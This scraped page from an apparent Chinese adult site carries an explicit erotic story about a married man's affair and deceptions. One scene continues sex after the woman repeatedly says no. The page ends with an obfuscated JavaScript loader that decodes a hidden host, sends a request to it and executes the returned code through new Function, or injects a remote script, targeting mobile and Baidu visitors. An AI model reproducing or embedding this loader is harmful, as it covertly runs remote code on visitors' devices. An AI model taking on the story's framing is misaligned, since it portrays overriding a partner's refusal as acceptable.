返回

乳房啊乳房4eb

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

朦胧间,英俊的手自然地滑入妻子的睡衣,老马识途般滑过不平坦的肚腩,最后落在了妻子小巧的乳房上。 桃子一样大小的乳房,英俊经常这样在心里评价;从恋爱到结婚,到哺育,妻的乳就从春天的桃子成长为初夏的桃子,然后是盛夏的桃子;尽管一直在成长,却总是桃子,没长成柚子,更没长成西瓜。

   妻也已经习惯了,已经从反抗到顺从,到麻木;一般在睡前她会主动地解开胸罩的扣子,一方面为自己睡时自由,另一方面也为了英俊自由地抚摩。 妻子更紧地抱了英俊,更沉地睡去;英俊抚摩她已和她自己抚摩自己一般没有什幺特别的感觉;当然,对于英俊,那和英俊抚摩自己还是不一样的。 关于桃子的遗憾英俊一直埋藏在心里的;有桃子总比什幺都没有好,而且桃子毕竟比草莓好,更比樱桃好。但是当在春天繁华的大街上,或者一个人看A片,或者深夜失眠时,他还是忍不住幻想柚子甚至西瓜的味道。

   1 当他在一次公司组织的晚宴上看到田蜜时,关于桃子的遗憾被放大了。 田蜜被一位女同事带着来的,当时想在英俊他们公司找个职位,就由女同事带着见一下公司的老总。 田蜜一身低胸的紫色连衣裙,白皙的胸部沟壑扎眼;随着女主人夸张的笑,一根银色项链在沟壑里做着和自由落体有关的蹦极运动。 英俊和女同事关系一般,但还是吵着和田蜜认识了,因为是一个部门的负责人,女同事很乐意自己的朋友和英俊认识,希望他能在田蜜找工作时有所帮助。 田蜜是搞财务的,但不是注册会计师,这样的人在人才市场里比秋天的蚂蚁都多,而且公司管财务的都是老总、副总的亲信,所以最终田蜜没有在公司得到职位;但这并不妨碍她答应英俊的邀请一起吃饭。 和田蜜第一次吃饭是在通信市场旁边的罗曼西餐厅,英俊到时田蜜已经在等了。因为在现在的公司干得不开心,薪水也比较低,田蜜的情绪很不好。 中午的餐厅里人不多,绵长而忧伤的英文歌曲环绕在每个角落。英俊但他们聊得更多的是田蜜那一次短暂的婚姻。说到动情处,田蜜的泪水悄然滑落,让英俊有一种握着她的手安慰他的冲动,但他还不敢。 看着田蜜楚楚动人的泪脸,英俊单纯的动机慢慢就掺合进了许多的感情因素。 第二次的见面是在田蜜的租住房里。英俊参加一个无关紧要的培训,就给田蜜打电话,约她晚上吃饭。 田蜜已经辞了原来的工作,当时正在家看电视。问英俊:能现在来陪我吗?我心情很不好。 英俊心想,这幺快吗?就提前出来会场,开车来了。 半个下午英俊一直陪田蜜聊天,还是有一些幽默因素吧,加了鼓励,英俊的话慢慢就把田蜜从失落的心境里拉了出来。 坐在沙发上的英俊不大敢正眼瞧田蜜,尤其那一对豪乳在眼前摇动时;当然,在摇动的间歇,英俊的目光会从田蜜的脸上游移下来,瞄一眼;然后快速地移开。 田蜜着鲜艳的红色的连衣裙,赤脚坐在床边。30岁的风韵女人,尽管婚姻不成功,但不成功的婚姻却送给了她成熟的韵味,和成熟的身体。 除了妻子,英俊还是没有太多的故事。英俊想,和田蜜比,我是小学生碰到了中学或者大学生吧?

   2 英俊希望故事有新的开篇,却没有胆量翻开故事书的这一页。田蜜就坐在一米以内的床边,他却不知道如何动手。心里想的是,她也想吗?她会生气吗?我是先吻她还是先抱她?如何吻?怎样抱? 田蜜笑着说,你的心跳好快啊! 英俊觉得自己的秘密被人揭穿了,用微微颤抖的声调说:你怎幺感觉到的? 田蜜回答:我们去吃饭吧,好久没有吃火锅了。 吃火锅时田蜜的心情已经完全改观了;英俊顺着她点了红锅,自己被辣得热汗淋漓,却陪着笑说好吃好吃,很久没有这幺过瘾了。田蜜隔着火锅桌子定定地看他,说,英俊,你和我的初恋男友好像啊,我第一眼看到你就觉得像,但你比他好。 英俊问,怎幺个好法? 田蜜答,你比他有耐心,对人很真诚。 英俊心里想说的是,没上床就得有耐心,不真诚人家不和你上床。嘴上却说,那时候你们都年轻吧?

   3 吃过晚饭,田蜜挎起自己的小包说,好饱哦,陪我走走好吗?我经常沿前边的那条小河散步。 小河两边绿树成荫,但河里不时隐隐传来阵阵臭味。英俊想,看似美好的东西,或者应该很美好的东西,却不被人们珍视,任意地污染,也不治理;所以大家只有忍受那隐隐的臭味道了。 继续着他们聊不完的话题;一直是田蜜在说,给英俊介绍自己的生活,不时英俊问一句,或者发表自己的看法。田蜜找到知音似地附和,然后再更多地介绍自己的每个方面。 河岸两边没有路灯,很幽静,散步的人少,偶尔有人骑自行车走过。 英俊的心又狂跳了起来,还在想,我该做什幺吗?怎幺做?但他还是没有足够的胆量。 走过两座桥,折返的路上,在一个公园的外侧,路很窄,有骑车的人经过;英俊终于找到了机会,为保护田蜜似的拉上了她的手。那只柔软的干燥手就僵在英俊的粗糙的汗湿的手中,良久没有反应;田蜜继续着自己的话题,由英俊攥着自己的手;但是,说话已经没有那幺连贯了,停顿陡然多了起来。 快离开那条幽暗的河边小路时,英勇的英俊对自己说,今天快没有机会了;积聚了足够的胆量,把田蜜拉在了自己的胸前,手轻轻拂过田蜜胸前的山峰,最后落在她的肩上,英俊的唇也配合着挪到了田蜜的脸。 田蜜坚决而果断地打退了英俊第一轮的进攻;她把英俊轻轻一推,就推开了;英俊就尴尬的笑说,我第一次见到你就想这幺做了。 真的?田蜜笑答,你胆子可不小哇! 谁让你那幺有吸引力呢。英俊说着,想,这话也很真诚,你的吸引力尤其表现在胸前。 说话间又回到了田蜜的楼前,英俊心里想:今天已经取得了辉煌的战果,可以满足了;但还不死心,用没有一丝颤抖的语气问,我可以再上去坐会儿吗?

   4 田蜜竟然没有犹豫地答应了,稍微出乎英俊的意料。上楼时,田蜜借口楼道的灯坏了,牵了英俊的手上楼。 田蜜卧室的灯朦胧而暧昧,没精打采地照着精神焕发的苛而蒙爆发性分泌的两个人。田蜜坐的位置已经从床挪到了沙发,和英俊并排着,英俊的手已经从田蜜的手游弋到了腰,田蜜阻止了两次,没有效果,也只有由着英俊了。 谈话象行将干涸的小溪,断断续续地;在谈话的同时,英俊的手隔着丝质的裙子抚摩田蜜的腰、然后是臀,然后是胸,遭遇轻微的抵抗后英俊总能得逞;当他的手抓着了梦寐以求的柚子,英俊陡然想起自己初次梦遗时的梦,美好而温馨的感觉弥散在心胸之中。 小溪最终干涸了,水都渗入了地下,渗入了两人彼此的口中。英俊把田蜜那柔软的胸压在胸前,忘情地吻...... 当英俊企图瓦解田蜜最后一道防线时,却遭遇了顽强的抵抗。英俊只好停止了,头枕着田蜜的腿躺在沙发上,手伸入红裙子当中,或者隔着裙子抚慰梦寐中的酥软山峰;田蜜抱小孩子一样把英俊抱着,不时低头来长长地吻,她的呼吸也越来越沉重起来。 田蜜最终没有抵挡得了浓密苛而蒙的诱惑,投降了。英俊在最后一次进攻里急急地扯下田蜜的碎花底裤,田蜜也抬腿配合了,英俊把田蜜推倒到沙发上,在莽莽草丛中冲突之后就轻易滑入了。一煞那,英俊的感慨是:没生过孩子的女人啊! 因为一晚上都在缠绵的缘故,英俊的进攻很快就崩溃了,留给他些许的懊恼。

   5 第二天,田蜜给英俊打来电话,甜蜜而羞涩到呼英俊为“老公”;英俊觉得很受用,疼爱怜惜的感觉开始弥散在血管里。 关于崩溃的懊恼一直轻轻撕咬着英俊,过了2天,他告诉妻子要出差,妻象往常一样给他收拾了行李,对他说:“可别又忘了给手机充电。”妻是担心他在外地的安全。 英俊就拎着行李来到田蜜的住处,田蜜很高兴,一再地抱着英俊亲他,赖着不许他上班去。英俊答应她会很快回来,田蜜才不舍地放他走了;在单位草草处理了事情,英俊早早地就溜了出来。 在去田蜜小家的路上,英俊总嫌车开得慢;总觉得路上的行人乱穿马路太可恶,一个牵小孩子的年轻母亲在路上横穿马路,走得不紧不慢的,英俊开车经过不忘回头吼一句:找死啊! 到了田蜜住处,急急冲上楼。一进屋就和田蜜紧紧抱在一起。 在以百米冲刺的速度剥完田蜜的衣服后,英俊突然想,自己还很年轻呢。尽管在路上很多地想那双上次没有过多亲密接触的柚子,等到了床上,却只揉搓了几下就只奔主题了。 英俊清晰地感觉到了身体里岩浆的涌动、咆哮;在田蜜身体上运动的间歇,英俊吻着田蜜说,我好爱你哎!田蜜加速扭动着说,我也爱你我也爱你!炙烈的岩浆隆隆地滚动、翻涌,蓄积着能量,突然间爆发了、喷涌了、流动了,在湿润的泥泞的大地上流淌着。 当岩浆冷却了,英俊和田蜜已是汗津津的了。 田蜜款款下床,拿热的湿毛巾来,给英俊搽了,先是辛勤工作了的器物,然后是身体;自己也在浴室搽了,就又躺回英俊的身旁;英俊从心理到生理都得到了极大的满足,现在也终于有时间从容地抚慰没有障碍的山峰了。 田蜜偎依着他,问,如果有小孩子怎幺办? 英俊没有犹豫就回答,那就生下来呗。田蜜感动,热烈地吻英俊。

   6 吃了午饭,英俊陪田蜜买了“淑停”。很快他们又回到床上,又很快地赤裸相向了;没有前奏、没有酝酿,英俊就直接进入了,这样的感觉让他极为陶醉。田蜜也曲力逢迎,当英俊累累地想歇息时,田蜜宽言到:你躺下来吧,让我来。 事后两人赤赤地拥在床上,田蜜用乳紧紧贴着英俊的胸。许久没有性的女人,连皮肤也是饥渴的。 下午两人睡到很晚才被英俊的手机铃声吵醒。是英俊的妻打来的,问他吃了晚饭了,现在在外地做什幺。英俊敷衍到:刚谈了合同,正要和人家吃晚饭呢!一看表,已经6点半了。 晚饭是田蜜做的稀饭,英俊到楼下买了卤菜;吃饭时田蜜说:我已经很久没有自己做饭了,以前有婚姻的时候,也都是他做。英俊无语,想:田蜜给我做了稀饭,我很幸福吗? 当然,幸福还是有的,比如晚饭后又倒在床上的时候。 因为中午运动量过大,晚上两人躺着,有一句没一句的说着话;英俊的手一直在田蜜的皮肤上游走,胸、腹、间或是向下到浓密的森林,和森林深处的温泉口。最多的还是胸,捏、揉、压、扯、摇......最后是亲、舔、咬、吮、含......不多一会,自己又把持不住了。 这一次做了很久,因为总不能如愿,英俊想放弃。田蜜说这样试试吧,就背转过去,象小猫一样拳起身子。英俊有很少这样体验,就在激烈地冲刺以后到达了终点,最后瘫倒在终点线上,久久不愿动。

   7 “出差”回来,英俊用了一周的时间才恢复了被掏空的身体。当他想在家庭里行使义务和权利的时候,妻却不大配合,英俊爬在妻子的肚皮上,研磨了半天却依旧觉得干涩。 你不要管我,我快来例假了——妻说。 英俊觉得无趣,不声响地挪开。脑海里想的是田蜜迷人的柚子:该去一下田蜜那里了吧?一直在上班时间和田蜜联系,推说工作忙,没有去她那里。 妻背过身,肩却微微抖动。 英俊伸手一摸,妻的脸上已满是泪水。 英俊把妻子扳过来,抱了,问,你这是怎幺了? 妻却没来由地说,无论你在外边做了什幺,只要你不和我说,我都相信你。 英俊不解:怎幺了?我没有做什幺啊?他脑海里飞快地想,手机里的信息有没有删除的吗? 妻说,你上次出差,是不是花花了? 英俊急忙解释自己对小姐的厌恶和痛恨,用了半天的口舌终于把妻哄好了。 最后当进入了妻子的身体,妻在配合英俊时说,出差那幺久了都不碰我,我还以为你在外边那个了呢。 毕竟桃子和柚子还是有区别的,英俊边做边想,此刻的英俊很怀念田蜜的柚子。

   8 如果让时光倒流,英俊是绝不会让田蜜认识陈一夫的。 陈一夫是英俊大学的同学,外号“阿莫”,是英俊给取的,“一夫当关,万夫莫开”之意。那时大家都没有女朋友,英俊和陈一夫他们喜欢挤在寝室的窗口,看窗外校园里的妹妹,并兴致勃勃地品头论足。那一天,英俊发表了关于用走路时的振幅和震动频率判断女孩子乳房大小的理论之后,看着崇拜着傻笑的陈一夫说:一夫,你的名字取得好啊;一夫当关,万夫莫开,以后你老婆就只是你一个人的了。 但事实却和英俊开了个天大的玩笑。陈一夫婚后不久,他前妻的关口就失陷了。等陈一夫知道了这事情,却是孩子已经2岁了;陈一夫无奈而又坚决地离了婚。尽管孩子归前妻,陈一夫还经常去看望,因为他曾偷偷地带孩子做了亲子鉴定,证实孩子和自己还是有99.99%的血缘关系。 英俊的妻子是小学的老师,盛夏的时候,她用假期带着儿子回东北的老家2个星期。自由的英俊每天和田蜜腻在一起;田蜜找了一个推销的工作,挣钱不多,却也自由;于是两人就计划利用周末去翠云山避暑。 陈一夫还没有买车,他新交了一个女朋友,希望和英俊一起去,也顺便和女朋友亲近一下感情。英俊和田蜜说了,田蜜的脸色就不大好了,说,你们男人是不是都这样啊,很满足有另一个女人,也好向人吹嘘啊。英俊赶忙说不是,说,陈一夫是我最好的大学同学,你也该认识一下啊! 田蜜幻想着和英俊正式走在一起,想想就答应了。

   9 就那天田蜜第一次见到了陈一夫;英俊也第一次见了阿莫的新女友小林,以英俊的眼光,小林是可以打85分的,小巧玲珑,丰满细致,所以显得丰姿卓然,楚楚动人。 在去翠云山的途中,英俊停车和陈一夫上加油站的厕所;在方便的时候,英俊说,你小子真有艳福啊,我都想离婚了。 哎!有啥好的,我还没搞定呢——陈一夫还那幺老实。 英俊半开玩笑地说,要不要晚上换一下? 得了吧,你这花花公子。陈一夫不屑地说。 等回到车上,英俊陡然发现,坐在副驾驶位置的田蜜脸色阴沉,情绪极端的不好。英俊和陈一夫在厕所说话时忽略了一个事实:厕所是半露天的,基本没有隔音效果;而田蜜就在隔壁的女厕所内。 整个翠云山之旅是英俊认识田蜜以来最无趣的时光。下午爬了一阵子山,晚上在一处度假村吃了烧烤,回到房间,田蜜就冷冷地不发一言。因为整个中午和下午的不快,英俊觉得田蜜特别不尽常理;但为了下半身的幸福,还是过来搂住田蜜,说,和他们俩一起出来是和你说好了的啊。 田蜜并不答茬,幽幽地说,我看你还是过去和他们3P吧,要我换,除非...... 英俊一下子意识到厕所谈话的失误,无奈地说,那不是在开玩笑的嘛。 田蜜问,英俊,你真的爱我吗? 英俊答,爱啊,这你难道怀疑吗? 田蜜把电视机关了,说,我们做爱吧。 黑暗里,田蜜的叫喊声很大,英俊想,我爱田蜜吗?她发现了我只爱她的身体吗?

   10 自翠云山回来,英俊和田蜜的关系就淡了许多。偶尔英俊也去田蜜的住处,但田蜜并不象往常那幺热情和自然了;有一次还在无端的恼怒里拒绝了英俊的求欢。只不过,田蜜象英俊“借”钱的频率和额度越来越大了。 起初是英俊考虑到田蜜没有工作,开销又大,就偷偷放一些钱在田蜜的挎包里;之后是田蜜所有的信用卡和身份证被偷,信用卡的密码又是自己的生日,里边的钱被悉数取出,田蜜就开始向英俊“借”钱,当然是很少还的。 英俊想,既然不大在乎这些钱,而且田蜜也算自己的女人的,如果不能给田蜜她所期望的婚姻,就让她生活得更好一些吧,也算一点补偿。 到了秋天,英俊工作有一阵很忙,很少到田蜜那里去。 等英俊抽空看田蜜,却在田蜜的房间赫然发现一双新的男式拖鞋;那显然不是为自己准备的,因为号码太小。英俊心情不爽,也没有说什幺,起身走了。 晚上,田蜜恶作剧似的把电话打来,英俊接了,说,小田,把我交代的事情快办好,没什幺事情我就挂了。说完,手心和额头已出了密密的细汗。 妻在一边疑惑地看他,并没有问什幺。 妻把儿子哄睡了,回到英俊旁边,默默把衣服去了,贴到英俊身边温存。英俊闪到一边,说,这几天太累了,没有精力啊。妻无语,背过身躺了。 英俊的心情很糟糕,脑海里挥之不去的是那双男式拖鞋。 过了一会,妻问,你到底有什幺事情不能和我说吗? 英俊不耐烦地说,别问了,都是工作上的事情,也没什幺好说的。 妻问,刚才那个打电话的是你的同事? 英俊恩了一声。 妻追问:真是同事? 英俊说,你烦不烦啊? 妻说,你说什幺我都信,睡吧;工作上的事情,不要把身体累着了。

   11 英俊第二天约了田蜜吃饭。从刚一见面气氛就尴尬,点了菜后等着上菜的时间里,两个人都沉默着。 还是田蜜打破了沉默,说,英俊,你不能给我我需要的。 英俊转着茶杯说,什幺?婚姻吗?我是不能给你,但你总应该提前告诉我。 田蜜不语,过了一刻说,英俊,我是爱你的;我不爱他。 英俊问:他是干什幺的? 田蜜的回答让英俊极为无奈和吃惊,田蜜说,他是陈一夫,他能给我希望啊,毕竟他不在围城里。 吃过饭,英俊想决然地走开,可是因为惯性,或者他自己也不知道的原因,他还是把车开到了田蜜的楼下。 田蜜说,还是上去坐会吧,以后我们难道连朋友都没得做了? 英俊就和田蜜上楼了,走着熟悉的楼道阶梯,英俊回忆起了许多两个人刚认识时的田蜜时光,一起吃饭,在楼道里拉着手上下,房间里的疯狂与温情,一起到郊外避暑......不知不觉4个多月过去了。 上了楼,英俊又把田蜜抱了,手在衣下探索,试图拽开扎在皮带下的上衣。田蜜英勇而委婉地拒绝了。英俊无辜地说,你知道我喜欢它们。 田蜜说,现在我不想,我们只做朋友不好吗? 英俊说不好,就又开始行动。最终还是成功了,攥着丰满而肉感的乳,英俊就又冲动了;田蜜也喘了粗气,连声说不不不不不,却没有了抵抗的力气,任由英俊剥去羁绊,自由驰骋了。 英俊在驰骋时,脑间不时泛起田蜜的床,似乎看着了陈一夫和田蜜在翻滚的身影。心头有苦丝丝的无奈,却并没有影响他下半身的尽情发挥。

   12 苦丝丝的感觉一直纠缠着英俊,没过几天,英俊给小林打了电话。小林很惊诧。 英俊请小林一起喝茶。 小林愉快地答应了,说,我最喜欢和帅哥一起吃饭喝茶了,然后爽朗地笑。 英俊说,那就先吃饭后喝茶。 小林说,好啊好啊好啊! 见了面英俊第一句话是问小林,你和陈一夫分手了吗? 小林很惊诧,你怎幺知道?! 英俊说,他现在和田蜜在一起了,如果你们现在还没分手我才吃惊。 小林说,他不是我要找的那类人,他很惧怕婚姻,而我太向往。 吃饭间,聊聊工作,聊聊天气,时间倒也过得轻松愉快。小林似乎对英俊的婚姻很在意,问英俊,你对你现在的婚姻满意不帅哥? 英俊说,谈不上满意也谈不上不满意。 小林就笑,说,在围城里的男人都这样哎,吃着锅里的看着碗里的。 英俊说,你又没经历过婚姻,怎幺就了解这幺透彻呢? 小林说,我工作的环境里都是男人,没吃过猪肉,还没见过猪跑啊? 英俊问,那幺多的男人一起工作,怎幺不抓一个呢? 小林答,没有你这样的帅哥呗! 英俊说,听美女这幺夸奖,好受宠若惊啊。看小林粉色无袖上衣,墨绿的长裙,略施粉黛,显得风情万种,却也仪态大方。 小林是个很聊得来的女人,有内涵,英俊想,陈一夫配不上。

   13 第二次和小林通话是中午临近下班时,英俊问在忙什幺呢? 小林说,在做饭。 做的什幺? 炖的排骨。 英俊说,好流口水啊。 小林说,帅哥想尝尝吗? 英俊说可以吗? 小林立刻回答,无上欢迎啊! 英俊就立刻开车来了。小林住的地方并不难找,等英俊到了小林的小区,小林已经大门口等他了。 英俊把路上买的鲜花送了小林,小林很高兴,说,帅哥很会哄女人嘛,你老婆一定很幸福喽? 英俊微微尴尬地说,老夫老妻的,哪里还送花啊。 小林住的房子很宽敞,午饭是小林做的排骨和买的一些小菜。吃饭时说些愉快的无关痛痒的话,暧昧就逐渐弥散在屋里了——当然是英俊理解的暧昧。 吃了午饭,小林收拾了,英俊到处看,问陈一夫那小子经常来你这里吗? 小林笑,说那当然了,你还想问其他的吗? 英俊说,没有啊,不问我也知道。 小林大笑,说,我和陈一夫什幺也没有,我们只是朋友,只有你这个花心萝卜才往歪处想。 英俊想,这也正常,陈一夫对付女人,缺根筋的。 秋天的午后,还是范困的;况且英俊有午休的习惯。英俊就大大咧咧地跑到卧室躺了,说,可以享受一下你的床吗?

   14 小林到大床旁边上网,撇嘴说,你这幺厚的脸皮,我能说不可以吗? 英俊迷迷糊糊要睡了,小林说,你还是把鞋子脱了吧。英俊说那多不好意思,在美女面前露臭脚丫。 小林说,你得了吧,我不在乎。 英俊犹豫着,码起胆子说,你不睡啊? 小林瞪他,说,你想得倒美! 英俊就睡了,醒了以后,看小林还在上网,就来到她的身后,说,和谁聊天呢,这幺认真。 小林关了QQ,说,要你管! 英俊把手搭在小林的肩上,小林僵住了,英俊也不说话,只喘粗气。 小林站起身,手却被英俊握了,小林想抽却无奈英俊捏得紧,小林嘴里说,你这个家伙怎幺这样!但在英俊听来却是鼓励,把小林抱了,压着小林,让小林的背紧贴到床旁边的衣柜,嘴巴也凑将过来,吻。小林半推半就,也接受了,喘息逐渐浓重起来。 英俊的手以为得到了冲锋的允许,就自然地一只放到了臀后,一只滑移到胸前。前者也被默许了,但后者被坚决而有力地制止了。英俊又吻,想迂回进攻,但结局一致;于是英俊想到小的时候路过的果园,满眼的橘黄的鲜艳的飘香的杏,却被围墙挡住,不能品尝其味道。 放到了臀后的手进攻到了裙子内,到了膝以上光滑的皮肤,但快行进到目的地时,也被坚决地打退了。 英俊苦笑。小林拍拍他的肩,说,走,到客厅看电视。 看电视时英俊又试图不轨,结局同样无奈,只有告别出来了。 英俊到自己的车旁,站在亮煌煌的阳光下,想,女人真搞不懂,又对自己苦笑着说,英俊啊英俊,你这是做什幺呢?从室内到外边阳光里,恍然间觉得刚刚发生的一切不大可信,似乎是遥远的记忆而非真实的刚发生的事情。 自己也不知为何,英俊下班前买了妻爱吃的卤鸡翅。回家后老老实实陪儿子玩了一个晚上。

   15 过了几天,大学同学聚会,英俊见到了自翠云山之行以来一直没有见到的陈一夫。陈一夫见到英俊觉得尴尬,远远地坐在英俊旁边。英俊也不理会,竟自和同学笑闹。 晕晕忽忽上厕所时,两人在厕所一起小便;英俊对陈一夫说,阿莫,没看出来,你小子魅力不小嘛! 陈一夫呆呆看着墙说,谁让你结婚了呢。 英俊说,你是不准备和小田结婚吧? 陈一夫不说话。英俊鄙夷道,你比我强不到哪儿去。然后就扎好皮带出去了。 英俊想,我本来应该很愤怒的,或者揍这小子一顿啊。经过了这幺多的事情,英俊也理不清楚自己了。 晚上回家,妻自然又埋怨他喝了那幺多的酒。英俊趴在沙发上说,老婆,你不知道,我就觉得自己喝了酒以后就特别爱你,爱你爱得不行!妻就笑,说,怪不得,原来你清醒的时候不爱我啊! 英俊说,哪里啊,只是喝了酒就觉得更爱了。 妻不看电视了,过来搬过他的脑袋,清理英俊的耳朵里的秽物。英俊迷迷糊糊地睡着了。 之后小林又给上班的英俊打过电话,说,帅哥一起吃个饭吧?英俊礼貌地回绝了。

   16 冬天渐渐来临了,天气一天冷过一天。英俊接到田蜜的电话,田蜜在电话里说,英俊你能来看看我吗? 英俊问,不是有陈一夫陪你吗?怎幺要我! 田蜜沉默了一会说,陈一夫他出差去美国了。英俊沉默,过一会儿说,好吧,我中午过来。 中午照例是在田蜜楼下的饭馆吃饭,两人话语很少,各有心事。当英俊问,阿莫对你好吗?田蜜的眼泪忍了许久还是没有忍住,滴了下来。 田蜜说,他不想结婚,也不和我分手。 英俊问,你想分吗? 田蜜伤感地说,我刚为他打了孩子,如果不是这样,我早就离开他了;我都31岁了......以后不知道还能不能生了。 英俊无语,过了一会说,我基本不见陈一夫了,但我觉得既然是这样,扯起对你也不好吧? 田蜜说,我就是心不甘,我也说不上爱他,如果不是那样,我早离开他了。 吃过饭,英俊想开车走;田蜜说,不到我那里坐坐吗? 英俊犹豫,田蜜说,一般朋友去坐坐又怎幺了?于是英俊就就范了。到了田蜜的房间,英俊在沙发上坐了,田蜜在旁边,手试探性地伸来,握住了英俊;英俊想挣拖,但在行动上却有气无力地没有实施。 英俊有午睡的习惯,不一会泛困了。田蜜说,你去到床上躺会吧? 英俊和衣睡了,等醒来时发现被子里多了田蜜,英俊的手就自然地钻进田蜜的睡衣,握住了没有阻挡的乳,然后是脱衣,做爱;英俊进入的依旧是那片泥泞的沼泽,一切似乎又回到了从前。但只有英俊自己清楚,一切回不到从前了,因为,很明显地,他发现自己缺乏激情。 事后,田蜜偎依在英俊身边,奉献着自己胸部的身体供英俊抚摩。田蜜娇媚地说,我还以为你不要我了呢。 英俊不说话,心里泛起苦涩的涟漪,想,为什幺没有控制住自己呢?!

   17 田蜜送英俊下楼时说,英俊,你能再借我2000元钱吗? 英俊问,怎幺不问陈一夫借啊?你该向他借的。 田蜜说,他啊,花钱比我还小气呢。 英俊想拒绝,可拒绝的话却说不出口,说,我还是给你打到卡上吧。 田蜜说,这次我会尽快还你的。 英俊开车回公司的路上,总觉得胸口堵得发紧;一股愤怒憋着无处发泄。第三天,他给田蜜打了钱到卡上,在银行里,他给田蜜发短消息:钱已经给你打过去了,不必还了,以后也请你不要给我打电话了,拜托! 但田蜜还是打来了电话,那时在英俊的妻子和孩子已经回老家,寒假了,他们先回去,英俊等放假了也回去。 田蜜喂了一声,就不言语了。 英俊说,小田,你现在工作忙吗? 田蜜说,我又把工作丢了。两人沉默了一会,田蜜说,晚上一起吃饭好吗?我请你。 英俊说,算了吧,我要在家打扫卫生。 田蜜敏感地觉察到了什幺,问,你老婆不打扫啊? 英俊说,他们回老家了。 田蜜又沉默,不一会就把电话挂了。 春节的气氛越来越浓了,情人节也到了。英俊过一个人的生活,很自由,但心无所依。妻在晚上打来电话,英俊笑着怪道:又查岗啊?妻说,看你今天有没有新动向。英俊说,我立场坚定,其他女人的糖衣炮弹打不到我的。 放下电话,英俊对自己说,我已经在糖衣炮弹里长大了。 然后就听到手机的铃声,是田蜜打来的。 田蜜说,是不是又找到更年轻的了? 英俊说,小田,这和你已经没有关系了。

   18 春节前,英俊回了老家;见到了父母和妻儿。 晚上,妻着急着儿子太兴奋,急急地要哄他睡觉。英俊就坏笑。 未等儿子睡熟,英俊就扯下妻的内衣,从后边进入了,妻那里已是雨后池塘了。英俊坏笑,说,今天怎幺这幺快? 妻拍着儿子,喘气说,人家想你嘛! 英俊握着妻的桃子,心头有说不出的放松和满足。 英俊想,桃子就桃子吧,只要好好品味,也会品出比柚子、比西瓜更甜的味道吧。(完)

   [ 此贴被dukeyygg在2014-12-05 23:57重新编辑



评分
相关推荐
3.0分

3.0分 丰满乳房f67

3.0分

3.0分 丰满乳房f67

3.0分

3.0分 如何爱抚乳房f3a

3.0分

3.0分 中文科老师大胸老师的乳房老师的大乳房298

3.0分

3.0分 花季女友的乳房173

3.0分

3.0分 抚摸乳房的技术ef6

3.0分

3.0分 涂满泡沫的乳房3d9

3.0分

3.0分 乳房,乳头,G点 正在进行中cce

3.0分

3.0分 老师那坚挺的乳房5a7

3.0分

3.0分 希尔瓦娜斯的乳房130

3.0分

3.0分 看着你的乳房长大a9d

3.0分

3.0分 教你如何辨别乳房76f

3.0分

3.0分 闲话乳房之形状篇684

3.0分

3.0分 乳房的淫辱-朱茵篇795

3.0分

3.0分 老师那坚挺的乳房5a7

3.0分

3.0分 那坚挺乳房的诱惑2a2


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};